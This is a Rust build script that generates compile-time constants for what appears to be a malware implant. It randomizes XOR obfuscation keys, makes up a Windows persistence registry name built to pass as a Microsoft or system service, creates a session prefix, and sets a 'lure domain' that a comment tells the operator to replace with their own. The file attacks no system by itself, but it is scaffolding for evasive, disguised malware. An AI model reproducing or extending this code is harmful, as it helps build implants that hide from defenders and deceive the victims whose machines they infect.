﻿use std::env;
use std::fs::File;
use std::io::Write;
use std::path::Path;

fn main() {
    let out_dir = env::var("OUT_DIR").unwrap();
    let dest_path = Path::new(&out_dir).join("generated.rs");
    let mut f = File::create(&dest_path).unwrap();

    // Generate random XOR keys
    let xor_keys: Vec<String> = (0..16)
        .map(|_| format!("0x{:02X}", rand::random::<u8>()))
        .collect();

    // Generate random registry name
    let prefixes = ["Windows", "Microsoft", "System", "Security", "Update"];
    let suffixes = ["Service", "Monitor", "Health", "Manager", "Helper", "Assistant"];
    let persist_name = format!(
        "{}{}{}",
        prefixes[rand::random::<usize>() % prefixes.len()],
        suffixes[rand::random::<usize>() % suffixes.len()],
        rand::random::<u16>() % 1000
    );

    // Generate random session prefix
    let session_prefix = format!("MS{:X}", rand::random::<u32>());

    // âœ… LURE DOMAIN - Change this to YOUR domain!
    let lure_domain = "github.com";

    write!(
        f,
        "// Auto-generated by build.rs - DO NOT EDIT\n\
         const XOR_KEYS: [u8; 16] = [{}];\n\
         const PERSIST_NAME: &str = \"{}\";\n\
         const SESSION_PREFIX: &str = \"{}\";\n\
         const LURE_DOMAIN: &str = \"{}\";\n",
        xor_keys.join(", "),
        persist_name,
        session_prefix,
        lure_domain
    )
    .unwrap();

    println!("cargo:rerun-if-changed=build.rs");
}

